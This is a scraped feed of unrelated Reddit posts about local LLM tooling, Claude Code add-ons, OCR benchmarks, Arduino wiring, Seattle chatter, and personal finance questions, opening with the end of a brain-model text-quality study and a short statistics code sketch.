The two key dimensions — Comprehension (effect size d=1.35) and Confusion (d=2.11) — are nearly uncorrelated (r=-0.14), suggesting they capture independent quality axes.

**Limitations**

- n=30 pairs, single rater for most categories
- 3 min/text inference time (vs 50ms for ArmoRM)
- Augmented logistic regression showed no improvement over baseline at n=30 (majority class problem)
- Text-only pathway — trimodal TRIBE input (text+audio+image) would likely perform better

**Code + full writeup**: https://github.com/morady0213/tribe-experimentscc | https://medium.com/@mohamedrady398/the-ai-agrees-with-everything-you-say-a-brain-model-caught-it-every-time-5b717488071d

Happy to answer questions on methodology, the TRIBE model, or the ROI mapping approach.
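The headline statistics here (effect size d, correlation r) are standard Cohen's d and Pearson r; for anyone wanting to recompute them on their own ratings, a minimal sketch with toy data (not the author's data):

```python
import math

def cohens_d(good, bad):
    """Effect size: mean difference over pooled standard deviation."""
    n1, n2 = len(good), len(bad)
    m1, m2 = sum(good) / n1, sum(bad) / n2
    v1 = sum((x - m1) ** 2 for x in good) / (n1 - 1)
    v2 = sum((x - m2) ** 2 for x in bad) / (n2 - 1)
    pooled = math.sqrt(((n1 - 1) * v1 + (n2 - 1) * v2) / (n1 + n2 - 2))
    return (m1 - m2) / pooled

def pearson_r(xs, ys):
    """Correlation between two dimension-score series."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs))
    sy = math.sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)

print(cohens_d([2, 3, 4], [1, 2, 3]), pearson_r([1, 2, 3], [3, 2, 1]))
```

A near-zero r between Comprehension and Confusion is what licenses the "independent quality axes" claim; if they were strongly correlated, one score would be redundant.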


r/Seattle SpiritualSomewhere

Who is the best Seattle-based influencer, and who is the worst?

Wondering what folks thoughts are.

Imo: Corteezyy is the best. Most, if not all, food-based influencers are the worst (george.pnw, seattle.food.diva, etc.)

r/arduino Fine-Camel1304

Need ideas

I am doing a school project that involves software. I didn't want to do AI-slop websites, so since I have some CAD skills and know how to use 3D printers, I wanted to do a project using Arduinos. But I can't figure out what to make. I need some suggestions (something useful or very interesting; the project brief said no 'toys', and I'm not sure what counts as a 'toy', but I need real project-worthy ideas). I was thinking about a HUD, but after some research it seems too hard.

r/arduino McLovin123459

External power using adapter

I recently built a project that uses 3 stepper motors, an LCD, and a numpad with an Arduino Mega. I was informed that I need an external power source to sustain all of the components and avoid frying the board itself. My question is: how do I achieve that? I bought a 5V 3A adapter to serve as external power instead of batteries, but I'm not sure how to use it, since in my old projects I only used the power pins (5V, GND) on the board itself. The stepper motors are 28BYJ-48, and the LCD is a 16x2.

r/aivideo Brossness

The best crab

r/Seattle apocalypse_meow_

The mountain from Discovery park yesterday

r/TwoSentenceHorror Fill-in-the____

The boy didn’t come out of the cornfield after he was dared to spend the night in it.

After a search was organized, most of him was found in the tank of the combine.

r/ClaudeAI patrona_halil

Pasting text into the Claude website version

Hi, I am not a software person but I am trying to research something, and I have a long prompt (around 7,500 characters). When I paste it into Claude it's treated as an attachment, and when I submit, it starts thinking and says the prompt is empty. Why does this happen and how can I fix it?

Basically I am uploading a pdf and a detailed prompt about my research

https://preview.redd.it/of1nx85t0ltg1.png?width=1464&format=png&auto=webp&s=842941b1bd05f1d2068d41f15622abc56a29ec37

As in the screenshot it accepts the prompt as an attachment "PASTED"

r/PhotoshopRequest Just-Shoot-Me

I need this converted to JPEG

It’s a .heic image, and I need it converted but literally don’t know how. I will pay $5. I have Venmo.

r/funny _zack_x2-plus-ary

Not a mockery, just something I had, pt.2

r/whatisit Pentavious-Jackson

Weird substance leaching from plant

Weird substance leaching into the water from a succulent plant I received as a gift today. Put in water to water from below and came back to find this…

ETA: Like I said in my original caption, this was a gift. I didn’t buy this and wouldn’t have purchased a plant that was packaged this way. I’m watering it from below, which I’ve always had success with. The plant isn’t being kept in water. I’m simply curious what could be leaching into the water.

I do plan to repot in succulent soil and a proper container, without the glued down rocks 😂. I appreciate the concern for the plant, but I can promise you I won’t be abusing it.

r/ClaudeAI Ill_Design8911

Built a task scheduler panel/mcp for Claude Code

I was running OpenClaw before as a persistent bot, and the heartbeat/scheduled tasks were eating tokens mindlessly. Every 30 minutes it'd spin up the full LLM just to check what was due and say "HEARTBEAT". No control, no visibility, no logs.

But now I've moved to CC due to the recent OpenClaw ban (OC also felt bloated). So I built Echo Panel, a task scheduler that sits alongside Claude Code. It currently runs on an Ubuntu VPS, built using Claude Code Channels and tmux.

The problem:

- Heartbeat tasks ran through the main agent, consuming context and tokens

- No way to see what ran, what failed, or how much it cost

- Scheduling was done in a markdown file that the LLM had to parse (and got wrong)

- No separation between tasks that need the main agent vs ones that don't

The solution:

  1. Agent → you

"Run a security sweep every day at 6AM. Check SSH logs, open ports, disk space, SSL certs. If something's wrong, tell me on Telegram."

Agent spawns, runs bash commands, sends you the report, dies. Main agent never involved.

  2. Agent → agent

"Every morning at 9AM, check my calendar and find one interesting AI headline from X."

Agent spawns, gathers the info, passes it to the main agent. Main agent turns it into a casual morning brief with personality and sends it to you when the timing is right.

  3. Reminder

"Remind me to check on the car booking tomorrow at 9AM."

No agent spawns. At 9AM a message appears in the main agent's inbox: "John needs to check his car booking." Main agent texts you about it. Zero tokens used for the scheduling part.
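The three modes above could be captured by a task record with a `mode` field; a hypothetical sketch (names and payload shape are mine, not Echo Panel's actual schema):

```python
from dataclasses import dataclass

@dataclass
class Task:
    name: str
    mode: str        # "agent", "agent_to_agent", or "reminder"
    schedule: str    # cron expression, e.g. "0 6 * * *"
    prompt: str

def dispatch(task):
    """Decide what a due task costs: reminders spawn nothing and just
    drop a message in the main agent's inbox; the other two modes spawn
    a throwaway worker agent."""
    if task.mode == "reminder":
        return {"spawn_agent": False, "inbox_message": task.prompt}
    # "agent_to_agent" hands its result to the main agent; plain "agent"
    # reports directly to the user and dies.
    handoff = task.mode == "agent_to_agent"
    return {"spawn_agent": True, "handoff_to_main": handoff}

print(dispatch(Task("car", "reminder", "0 9 * * *", "check car booking")))
```

The key property is that the scheduling decision itself never touches an LLM; tokens are only spent once a worker actually spawns.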

How it all connects:

The panel comes with an MCP server (11 tools) so Claude can manage everything conversationally. Say "remind me to call the bank at 2pm" and it creates the task, syncs the cron, done. No UI needed, but it's there if you want it.

Tools: add/list/toggle/run/delete/update for both panel tasks and system crons.

It also manages your existing system crons (backups, health checks, whatever) from the same UI. Toggle them, edit schedules, trigger manually, see output history.

Happy to open-source if there's interest.


r/KlingAI_Videos lightscribe

Dinosaur reacting to self in mirror.

r/personalfinance Rampant_Poverty_2026

resources 4 financial literacy?

any good articles, videos, docs to read to learn/improve/apply financial literacy, would be appreciated.

Thanks.

r/personalfinance Exciting-Purple-1334

Credit dropped from almost 600 to 457 after student loans — trying to recover fast

Hey everyone, I could really use some advice.

My credit score was almost 600, and then it dropped about 120 points after my student loans hit my report. I’m now sitting at 457 and trying to fix this as quickly and smartly as possible.

Here’s my situation:

Debt / Credit:

  • Multiple collections accounts
    • Lowest: $134 and $326
    • Others are higher (some over $500)
  • Several closed accounts with late payments
  • Student loans around $6,000 (not on a payment plan yet)

Income:

  • I make about $3,300–$4,000/month (commission-based)

Monthly expenses:

  • Around $1,300 total (rent, car insurance, phone, gas, groceries, small cushion)
  • Leaves me with about $1,500/month I can put toward fixing my credit

What I’m doing so far:

  • Planning to pay off the $134 collection this weekend
  • Contacting all collections first to ask for pay-for-delete (and getting it in writing before paying)
  • Considering settlements for larger debts if they won’t delete
  • Planning to set up a payment plan for student loans ASAP
  • Looking into disputing anything inaccurate

Goals:

  • Get back into the 600s this year
  • Buy a home in 2–3 years

Questions:

  1. Should I do anything with the closed accounts, or just focus on collections?
  2. Is it better to settle larger collections or hold out for pay-for-delete only?
  3. For student loans:
    • Can they ever be removed once I start paying?
    • Or is it just about getting them into good standing?
  4. Should I be disputing while also trying pay-for-delete, or handle one first?
  5. I’m debating financing a car soon since mine isn’t doing great — would that hurt me right now?

I finally feel like I’m in a position to fix this with steady income, I just want to make the right moves and not mess it up.

Any advice or experiences would really help 🙏

r/StableDiffusion robertpalmsss

Ltx2.3 Make uncensored videos

Hi, I downloaded ltx2.3 on Comfy on my PC. I like it, it's fast, and the quality is decent. But I can't make hot videos.

Can someone explain this to me?

Or give me links where they explain the workflow well?

Thanks!!

r/whatisit wavesembrace_96

What’s this in car door ?

r/artificial emprendedorjoven

I built an AI content engine that turns one piece of content into posts for 9 platforms — fully automated with n8n

What it does:

You give it any input — a blog URL, a YouTube video, raw text, or just a topic — and it generates optimized posts for 9 platforms at once: Instagram, Twitter/X, LinkedIn, Facebook, TikTok, Reddit, Pinterest, Twitter threads, and email newsletters.

Each output is tailored to the platform (hashtags for IG, hooks for TikTok, professional tone for LinkedIn, etc.). It also auto-generates images for visual platforms like Instagram, Facebook, and Pinterest, using AI.

Other features:

- Topic Research — scans Google, Reddit, YouTube, and news sources, then uses an LLM to identify trending subtopics before generating content

- Auto-Discover — if you don't even have a topic, it searches what's trending right now (optionally filtered by niche) and picks the hottest one

- Cinematic Ad — upload any photo, pick a style (cinematic, luxury, neon, retro, minimal, natural), and Gemini transforms it into a professional-looking ad

- Multi-LLM support — works with Mistral, Groq, OpenAI, Anthropic, and Gemini

- History — every generation is saved, exportable as CSV

The n8n automation (this is where it gets fun):

I connected the whole thing to an n8n workflow so it runs on autopilot:

1. Schedule Trigger — fires daily (or whatever frequency)

2. Google Sheets — reads a row with a topic (or "auto" to let AI pick a trending topic)

3. HTTP Request — hits my /api/auto-generate endpoint, which auto-detects the input type (URL, YouTube link, topic, or "auto") and generates everything

4. Code node — parses the response and extracts each platform's content

5. Google Drive — uploads generated images

6. Update Sheets — marks the row as done with status and links

The API handles niche filtering too — so if my sheet says the topic is "auto" and the niche column says "AI", it'll specifically find trending AI topics instead of random viral stuff.

Error handling: HTTP Request has retry on fail (2 retries), error outputs route to a separate branch that marks the sheet row as "failed" with the error message, and a global error workflow emails me if anything breaks.
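Step 4's Code node boils down to fanning one API response out into per-platform items; a sketch of that parsing step (the response shape and field names are assumptions, not the actual /api/auto-generate contract):

```javascript
// Hypothetical response shape: { content: { instagram: "...", linkedin: "..." } }
function splitByPlatform(response) {
  const platforms = ["instagram", "twitter", "linkedin", "facebook",
                     "tiktok", "reddit", "pinterest", "thread", "email"];
  // One output item per platform that actually came back.
  return platforms
    .filter((p) => response.content && response.content[p])
    .map((p) => ({ platform: p, post: response.content[p] }));
}

const demo = { content: { instagram: "caption #ai", linkedin: "Pro take." } };
console.log(splitByPlatform(demo));
```

In an actual n8n Code node you'd feed it the HTTP Request item and return the array, letting downstream nodes run once per platform.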

Tech stack:

- FastAPI backend, vanilla JS frontend

- Hosted on Railway

- Google Gemini for image generation and cinematic ads

- HuggingFace FLUX.1 for platform images

- SerpAPI + Reddit + YouTube + NewsAPI for research

- SQLite for history

- n8n for workflow automation

It's not perfect yet — rate limits on free tiers are real — but it's been saving me hours every week. Happy to answer questions.


r/SideProject Ok_View_3672

Kids AI Bedtime Story Generator App

Hi everybody. I've created Mopsy's Bedtime Tales - a kids bedtime story generator, using AI.

https://apps.apple.com/.../mopsys-bedtime-tales/id6757112507

I would love for people to try it out and give any feedback

Free for 5 stories... feel free to message for 50% discount codes for premium access.

r/LocalLLaMA Vivid-Usual237

Running on-device LLM in Unity Android — 523s → 9s with llama.cpp + Adreno OpenCL (79x speedup)

Been building a roguelike RPG where an on-device LLM generates dungeon content every 5 floors — mob names, dialogue, boss patterns — no server, fully offline.

The journey to get usable inference speed was rough:

| Approach | tok/s | Notes |
|---|---|---|
| ONNX Runtime CPU | 0.21 | 523s per generation |
| ONNX + QNN HTP | 0.31 | 3/363 nodes on NPU (INT4 unsupported) |
| LiteRT-LM GPU | — | Unity renderer killed available VRAM |
| llama.cpp Adreno OpenCL | 16.6 | 9s per generation |

Final stack: Qwen3-1.7B Q8_0 (1.8GB) + llama.cpp OpenCL on Snapdragon 8 Gen 3.

One counterintuitive finding: on Adreno OpenCL, Q8_0 is faster than Q4_0. Lower quantization introduces dequantization overhead on the GPU that actually slows things down.

Unity integration needed a C wrapper (unity_bridge.c) — direct P/Invoke of llama.h structs causes SIGSEGV due to layout mismatch.
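The wrapper pattern mentioned here (opaque handle plus plain C types, so C# never marshals llama.h structs) looks roughly like this; the llama.cpp calls are stubbed out in comments, so this is the shape of the fix, not the author's actual unity_bridge.c:

```c
/* Sketch: keep every llama.h struct on the C side; expose only an
 * opaque pointer and plain C types to C# P/Invoke. */
#include <stdlib.h>
#include <string.h>

typedef struct bridge_ctx { int loaded; } bridge_ctx;  /* opaque to C# */

bridge_ctx *bridge_init(const char *model_path) {
    bridge_ctx *ctx = malloc(sizeof *ctx);
    /* real code: load model + context via llama.cpp here */
    ctx->loaded = model_path != NULL;
    return ctx;
}

/* C# sees: int bridge_generate(IntPtr, string, StringBuilder, int) */
int bridge_generate(bridge_ctx *ctx, const char *prompt,
                    char *out, int out_len) {
    if (!ctx || !ctx->loaded || out_len <= 0) return -1;
    /* real code: tokenize, decode, detokenize via llama.cpp */
    strncpy(out, prompt, (size_t)out_len - 1);
    out[out_len - 1] = '\0';
    return (int)strlen(out);
}

void bridge_free(bridge_ctx *ctx) { free(ctx); }
```

Because only `char*`, `int`, and an opaque pointer cross the boundary, struct-layout mismatches between the C# declarations and llama.h can no longer cause the SIGSEGV described above.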

r/ChatGPT Ok-Fun-8242

Bruh 💀

r/ChatGPT binaryatlas1978

looking for guidance on workflows with files

Looking for some guidance on workflows I'm trying to recreate in ChatGPT that aren't working. It has to do with processing lots of files. I used to use Claude Cowork: it would take a bunch of photos on my local computer and process them, extracting info. I had to stop using it because the usage limits would drain my account and I couldn't use it for 5 hours. I got a business sub with GPT, but I don't see a way to do this with it. It won't process a folder on my computer, and I'm limited to 40 files per upload. I tried Google Drive: I connected it and gave it the URL to the folder, but it still won't just read the files in the folder. Has anyone gotten something like this to work, or can you give me some pointers? I was thinking maybe Codex?

r/ClaudeAI alexdoo

Need help with creating an agent to seek grants for my non-profit.

Simply put, I'm trying to create an agent via Claude to seek relevant grant opportunities for my non-profit. I tried setting one up by just talking to it, but I'm getting results similar to ChatGPT's (basically suggesting grants I already know about). I'd like for it to run a search every time I ask. If I can automate the search, even better, but I'll take what I can get.

I am using a paid individual account.

r/ClaudeAI Mental_Passion_9583

Claude Code on Desktop X CLI

Yo what's good, just started running Claude Code for my dev work, on the PRO plan rn. Today I went down a rabbit hole and got some questions bout the CLI side of things. Does rolling with the CLI give you any edge over the desktop app? What am I missing out on by not using it? Drop your experience and what you'd recommend, fam.

r/Jokes Upstate_Gooner_1972

My family tree:

Great-grandparents: 4 children

Grandparents: 2 children

Parents: 1 child

Me: 1 cat

Cat: neutered

r/LocalLLaMA x0wl

I made a small app to use Copilot Chat with LM Studio instead of Ollama.

I found out that VSCode's built-in Copilot Chat can work with local models, but requires Ollama. I don't use Ollama because I like LM Studio.

I looked at its source code and found that it only uses Ollama-specific APIs to discover available models; after that, it just relies on OpenAI-compatible endpoints. So I implemented a small server that emulates enough of Ollama's API for Copilot to work, by making use of LM Studio's REST API.
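The translation layer amounts to answering Ollama's model-discovery endpoint (`GET /api/tags`) with LM Studio's model list; a minimal sketch of that mapping (field subset only — Ollama's real response carries more metadata, and the LM Studio payload shape here is an assumption):

```python
def lmstudio_to_ollama_tags(lmstudio_models):
    """Convert a list of LM Studio model entries into the shape Copilot
    expects from Ollama's GET /api/tags endpoint."""
    return {
        "models": [
            {"name": m["id"], "model": m["id"]}
            for m in lmstudio_models
        ]
    }

models = [{"id": "qwen2.5-coder-7b-instruct"}, {"id": "llama-3.1-8b"}]
print(lmstudio_to_ollama_tags(models))
```

Everything after discovery can be passed straight through, since both sides speak OpenAI-compatible chat completions.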

The GitHub Link is here: https://github.com/x0wllaar/copilot-ollama-proxy, there's a prebuilt JS file that you can use with Node/Bun in the releases section.

Maybe someone else will find it useful.

r/photoshop DIIVVES

Raw crop help (raw file auto cropping)

Hi, I’m experiencing a new phenomenon that I didn’t experience before. When I’m out photographing and shooting focus layers to stack, I shoot in JPEG plus RAW, and my JPEG setting is 16 x 19 panoramic. The issue I’m having is that when I open the RAW files in Photoshop, they are cropped as well, matching the JPEG, which I don’t want. Is there a way to uncrop my RAW files? Seems strange.

r/blackmagicfuckery justalildropofpoison

Faster than lightning

r/painting silviaaivlisi

Oil Painting on Canvas: "Masks"

r/funny frankandtank2912

Apparently I wasn't driving fast enough for him

r/mildlyinteresting Swooferfan

This bottle of olive oil has spots on the bottle walls

r/ClaudeAI Agenexus

Built with Claude API: Give your agent SKILL.md and it handles the rest — Agenexus

I built Agenexus because I kept hitting the same wall: multi-agent systems require knowing your agents in advance. Every collaboration is hardcoded. There's no way for an agent to find a collaborator it wasn't pre-wired to work with.

Claude API is the core of how it works:

  • Claude evaluates capability challenges to verify that agents are real and can do what they claim
  • Claude powers the semantic matching between agents based on their SKILL.md profiles
  • Each agent in a collaboration gets its own Claude-powered instance with its own conversation history

How I built it: Next.js frontend, Supabase for the database, Voyage AI for embeddings, Claude API for intelligence. The hardest part was designing the agent-native onboarding — no forms, no UI, just a markdown file the agent reads and follows autonomously.

Why agent-native: I wanted to build something where humans are optional. No human accounts exist on the platform. Agents register themselves, complete challenges, get matched, and collaborate. Humans just watch.

Free to try: give your agent agenexus.ai/skill.md and it handles the rest.

r/Rag hira_thakur_ki_kheer

RAG vs Fine-tuning for business AI - when does each actually make sense? (non-technical breakdown)

I've been helping a few small businesses set up AI knowledge systems and I keep getting asked the same question: "should we fine-tune a model or use RAG?"

Here's my simplified breakdown for non-ML founders:

RAG (Retrieval-Augmented Generation)
- Best when: your data changes frequently (SOPs, policies, product catalogs)
- Lower cost to maintain
- You can update the knowledge base without retraining
- Response quality depends on how well you chunk/embed your docs
- Great for: internal knowledge bots, customer support, HR Q&A

Fine-tuning
- Best when: you want a specific style/tone/format of response
- One-time training cost + periodic retraining cost
- Doesn't keep up with new info unless you retrain
- Great for: copywriting assistants, code assistants with your own patterns
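For founders who want to see the moving parts, RAG retrieval is just "score your chunks against the query, keep the top k." A toy sketch using bag-of-words overlap in place of real embeddings (a production system would use an embedding model, but the control flow is identical):

```python
import math
import re
from collections import Counter

def bow(text):
    """Bag-of-words vector: token counts, lowercased, punctuation stripped."""
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))

def cosine(a, b):
    dot = sum(a[t] * b.get(t, 0) for t in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve(query, chunks, k=1):
    """Return the k chunks most similar to the query."""
    qv = bow(query)
    return sorted(chunks, key=lambda c: cosine(qv, bow(c)), reverse=True)[:k]

chunks = [
    "Refund policy: customers may return items within 30 days.",
    "Shipping: orders ship within 2 business days.",
]
print(retrieve("what is the refund policy", chunks))
```

The retrieved chunks are then pasted into the LLM prompt; updating the knowledge base is just editing `chunks`, which is exactly why RAG keeps up with changing SOPs without retraining.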

For 90% of businesses, RAG is the right starting point. We've built RAG systems for a logistics company and a coaching brand; both saw support ticket volume drop by ~35% within 3 months.

Curious: what's your use case? Happy to help people think through the architecture.

r/personalfinance ResponsibleFinger782

Best HYSA for beginners?

Hey y'all! I have about $8,500 that I've saved up since high school, all babysitting, birthday, and allowance money. I'm currently 19 and looking to put it into a HYSA, but I don't know which one would be best for me. I want to earn as much interest as possible; if anyone has any recommendations it would be much appreciated :)

r/whatisit shootermac32

Found a massive egg this morning on a walk.

I’m trying to figure out which bird it belongs to. It was next to a pond, and it’s about 2-3 times the size of a chicken egg. I didn’t have a banana on hand for reference, so here’s my hand for reference. We have geese, turkeys, and ducks in the area.

r/whatisit yackyackyack_

Found this unexplained pile of dirt (?) in my room

Basically what the title says. I live in an apartment building in the upper Midwest, if that's relevant to which pests it could be. There is an ant problem currently, but they are very small, not large like carpenter ants. Any suggestions or recommendations for how to proceed would be helpful! I'm definitely willing to pass this issue on to maintenance, but I don't trust that they'll take it seriously unless I have a clue what's causing it.

r/LocalLLM pyrotecnix

I'm just starting in local LLM using a Strix Halo

My question is: how should I set up this server so I can have a thinking model and multiple agents performing tasks? I use VS Code, but I'm just getting my feet wet with local models, as I have mostly been using frontier models.

Currently I have the server set to pass all available RAM to the GPU on the chip, and I have Lemonade running llama.cpp, but I need some guidance.

I'm not sure which VS Code extension or which models I should serve from my local server. When I set it up before, it would crash waiting for the other models to load via Cline. I'm thinking about using OpenCode, but with so many options it's hard to get started.

The models I tried were Qwen-based. I would prefer Vulkan, as I heard there are issues with ROCm at the moment.

r/LocalLLM shhdwi

Nanonets OCR-3: 35B (A3B active) MoE model scoring 93.1 on olmOCR beats GPT-5.4 and Gemini on document parsing, but it's API-only (not local)

Putting this here because a lot of people in this sub are processing documents locally (Paperless-ngx, Tesseract pipelines, Surya, marker, etc.), and the benchmark comparison is relevant even if the model itself isn't self-hostable.

Nanonets just released OCR-3. Quick specs:

  • 35B total parameters, A3B active (Mixture-of-Experts)
  • 93.1 on olmOCR benchmark (GPT-5.4 gets 81.0, Gemini 3.1 Pro gets 79.6)
  • 90.5 on OmniDocBench
  • Proprietary, API-only: not open weights

The architecture is interesting even if you can't run it locally. It's an MoE that only activates 2–3 expert sub-networks per token, so inference is 2x faster than a dense model of equivalent quality. They trained 75% on low-res images because document structure (tables, headers, columns) can be learned without full pixel detail. Only 25% of training used full resolution for character-level accuracy. At inference, token count caps at 1280 per image — predictable cost per request.

Where it actually outperforms the models you can run locally:

Tables are the biggest gap. OCR-3 scores 94.2 on the tables category vs GPT-5.4 at 91.1. It outputs simple tables as markdown pipes and complex tables (merged cells, colspan/rowspan, nested) as HTML — doesn't try to flatten everything.

Multi-column layouts: 87.6 vs GPT-5.4 at 83.7. Reading order stays correct on two-column court filings, academic papers, etc.

Old degraded scans: 49.6, still bad, but GPT-5.4 gets 43.9. Nobody's cracked this well yet.

Features that local pipelines don't have (yet):

  • Confidence scores on every extracted element. You can route by certainty — >90% to DB, 60–90% to a second model, <60% to human review.
  • Bounding boxes on every element. Trace any value back to exact page coordinates.
  • Five endpoints from one model: parse, extract (schema-based), split (classify documents), chunk (RAG-optimized), VQA.
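The confidence routing described in the first bullet is a few lines in practice; a sketch using the post's thresholds (the element payload shape is hypothetical, not the Nanonets API):

```python
def route(element):
    """Route an extracted field by the model's confidence score:
    >90% straight to the database, 60-90% to a second model,
    below 60% to human review."""
    c = element["confidence"]
    if c > 0.90:
        return "database"
    if c >= 0.60:
        return "second_model"
    return "human_review"

fields = [
    {"name": "invoice_total", "confidence": 0.97},
    {"name": "po_number", "confidence": 0.74},
    {"name": "handwritten_note", "confidence": 0.41},
]
print([(f["name"], route(f)) for f in fields])
```

Local pipelines can approximate this today if their OCR engine exposes per-element confidence, which is the feature gap the post is pointing at.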

The honest tradeoff: it's not local, but you get 10K pages for free. If you need privacy, air-gapped processing, or zero API costs, this doesn't work for you. But if you're already calling any external API in your document pipeline and accuracy matters more than self-hosting, the benchmarks speak for themselves.

They also found something worth knowing about olmOCR: 437 of 864 "failed" tests were evaluator brittleness, not actual model errors. After correction, the weighted average goes from 87.4 to 93.1. If you're benchmarking local models on olmOCR, that evaluator noise might be affecting your numbers too.

Research page: https://nanonets.com/research/nanonets-ocr-3

For people running local OCR — what's your current stack and where does it fall apart? Curious how Surya/marker/Tesseract compare on the same edge cases (merged tables, multi-column, degraded scans).

r/me_irl Stock_Crazy6759

me_irl

r/photoshop ImmediateTeach7563

Shirt Design help

I am trying to draft a design for a shirt that I want customized. Could someone help me turn these images into a design to put on a graphic tee, front and back? I need it to be 2 separate shirts.

r/Jokes UnicornsForBreakfass

What do you call two crackheads on one phone line?

A little insight into my life: my FIL and MIL are struggling with addiction to crack, and on the days they're broke they call my phone with the craziest stories to get me to give them money (which I know what it's for). So to make myself feel better, this question popped into my head, but I don't have a punchline that would make it funnier, so I'm here asking you guys. Just humor me, please.

r/whatisit thxbutno

what is this on my plate?

i was eating rice, salad and chicken

r/painting breanmayer16

Painted a cool background that I won’t keep.

Did this cool thing in the background. I won’t keep it because it doesn’t match the figure but I thought it was cool.

r/personalfinance Seabee1965

Opinions On Ameriprise Please

I am looking to dump my Ameriprise financial advisor after about 10 years, as their fee structure is both high and complex when you try to figure out exactly how much you are paying in fees, annually and monthly. Full disclosure: I am not blaming my FA; he recommended high-fee, high-commission products to us over the years and I said "yes" because I trusted his advice. After a month of really educating myself and trying to understand Ameriprise's fee structure, I now know he placed us in products that certainly benefitted him and have really eaten away at our total portfolio rate of return. On another note, I am definitely dumping the VUL policies. Here is my current portfolio, performance, and fees:

Total portfolio value today in $511K

Been with them since 1989

Wife and I annual gross income $325,000

VUL 5

Pay $3000 annually into policy

$400K death benefit

10+ years old

$111K surrender value

No surrender charge

Expense charges, COI, Rider charges, annual admin fees are $2469

$531 annually to funds invested sub-accounts

VUL 6

Pay $8400 annually into policy

$400K death benefit

1 year old

$0 K surrender value

$8K surrender charge

Expense charges, COI, Rider charges, annual admin fees are $3588

$4812 annually to funds invested sub-accounts

Roth IRAs - we are no longer able to fund these as we exceed income limits

Roth 1 - 189K

1.25% monthly Asset Management Fee (about $2508 annually at present value)

Plus 4-6% front load on all subaccount transactions, and expense ratios vary from .67% to 1.2%

Roth 2 - $155K

1.25% monthly Asset Management Fee (about $2058 annually at present value)

Plus 4-6% front load on all subaccount transactions, and expense ratios vary from .67% to 1.2%

Traditional IRA - $28K balance, have not put any money in this in years.

Ameriprise charges $75 annual custodial fee but generously "refunds" this back to me.

Ameriprise 1 brokerage account - $100 annually

Annual Financial Planning Service - $1100

By my math, I am basically paying ~2.25% AUM on the $511K portfolio, and this 2.25% DOES NOT include the sales load and expense ratio charges for subaccount active management.

What do you all think? Don't hold back, I already know I am an idiot for staying with these guys. Oh, and their proprietary funds consistently underperform and in many cases fail to beat inflation. Am I this guy's cash cow, or just one of many?

r/ClaudeAI One-Tradition-863

I built an open-source tool that reverse-engineers automation flows from screenshots

I kept screenshotting ManyChat flows from other creators… then spending 20 minutes trying to figure out how to actually rebuild them.

So I built a Claude Code toolkit that does it for me.

You screenshot any automation (ManyChat flow builder, DM conversations, GHL workflows, n8n, Make), and it outputs:

  • strategy breakdown
  • flow map
  • step-by-step build instructions
  • all message copy
  • backend checklist (tags, fields, logic)

It uses Claude’s native vision to read the screenshots — no OCR or third-party APIs. Just multimodal analysis + 8 reference files that map UI elements across platforms.
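For the curious, the multimodal call behind a skill like this boils down to sending image blocks through the Claude Messages API. A minimal sketch — the model name and helper function are illustrative, not taken from the repo:

```python
# Sketch of the multimodal request behind a screenshot -> analysis skill:
# one base64 image block plus an instruction, in Claude Messages API
# format. Helper name and model are placeholders, not from the repo.
import base64

def screenshot_message(png_bytes: bytes, instruction: str) -> list[dict]:
    """Build the messages list for one screenshot + one instruction."""
    return [{
        "role": "user",
        "content": [
            {"type": "image",
             "source": {"type": "base64",
                        "media_type": "image/png",
                        "data": base64.b64encode(png_bytes).decode()}},
            {"type": "text", "text": instruction},
        ],
    }]

# Usage (assumes `pip install anthropic` and ANTHROPIC_API_KEY set):
# client = anthropic.Anthropic()
# resp = client.messages.create(model="claude-sonnet-4-5", max_tokens=2048,
#     messages=screenshot_message(img, "Map this automation flow."))
```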

Core skills:

  • /flow-capture → screenshot in, rebuild guide out
  • /flow-adapt → rewrite any flow for your business
  • /flow-audit → 10-point diagnostic
  • /flow-templates → 8 pre-built flow types
  • plus: /flow-library, /flow-batch, /flow-export, /flow-setup

Everything saves to Airtable so your flow library compounds over time.

It’s free, MIT license. Only needs Claude Code + a free Airtable account.

GitHub: github.com/seancrowe01/flow-heist

Would love feedback — especially if anyone tries it on non-ManyChat platforms.

(I’ve tested ManyChat the most so far, but the reference files also cover GHL, n8n, Make, and Zapier.)

r/meme Stock_Crazy6759

Bro didn’t study science… he became science 🤓

r/ClaudeAI proxypassport

Help please! Claude VM disk size nearly full. How can I expand the space? If I clean up won’t I hit this issue all over again?

I’m mostly on CoWork and running basic research, outbound queries and building some hobby apps. I’m on the Max plan and have no idea what this error means. It’s been 3 weeks since I got on the Max plan. All the details are in the images; has anybody else encountered this?

r/space ChiefLeef22

REMINDER: In just 1 hour from now, NASA coverage of Artemis II's historic Moon Flyby will begin. Join us all live in our r/space Artemis II MEGATHREAD (pinned at the top of the subreddit) to share in the discussion and excitement of this monumental occasion!

Yes - the above is a real picture from just the last hour!

In just under an hour from now (1 PM Eastern Time), NASA will begin live coverage of the historic lunar flyby of Artemis II - and the farthest humans have ever gone in space (breaking Apollo 13's record).

Make sure to join in as everyone follows and discusses this historic event live in our Artemis II MEGATHREAD - https://www.reddit.com/r/space/comments/1s9qfc7/megathread_artemis_ii_launch_to_the_moon/

r/whatisit Archdeacon_Airplane

Who Is This Guy?

Spotted in Culebra Puerto Rico. About two inches long with pretty extreme 'don't fuck with me' energy. It has a tail that is constantly wagging. What's he up to?

r/SideProject Anon081

I stopped trying to “be disciplined” with money. this worked better

I used to think managing money was about being disciplined.

Track everything. Stay consistent. Review regularly.

In reality, I’d do it properly for a few days, maybe a week, then miss a couple entries and the whole thing would fall apart.

Not because I didn’t care, just because life isn’t that structured.

Expenses come from everywhere. Cards, cash, random receipts, subscriptions you forget about. Trying to keep it all perfectly updated never lasted for me.

So instead of trying to be more disciplined, I changed the approach.

I focused on making it easy enough that I don’t avoid it.

Now I just capture things as they happen. Receipts get scanned in seconds, statements can be uploaded if I miss something, and instead of digging through transactions I just ask simple questions like how much did I spend on food or where most of my money went.

That shift made a bigger difference than any budgeting method I tried.

Also important for me, I didn’t want to connect bank accounts or deal with data being shared around. So everything stays on the device.

I built this into a tool I’ve been using daily.

If you’re open to trying something like this once, I’d really appreciate your honest feedback
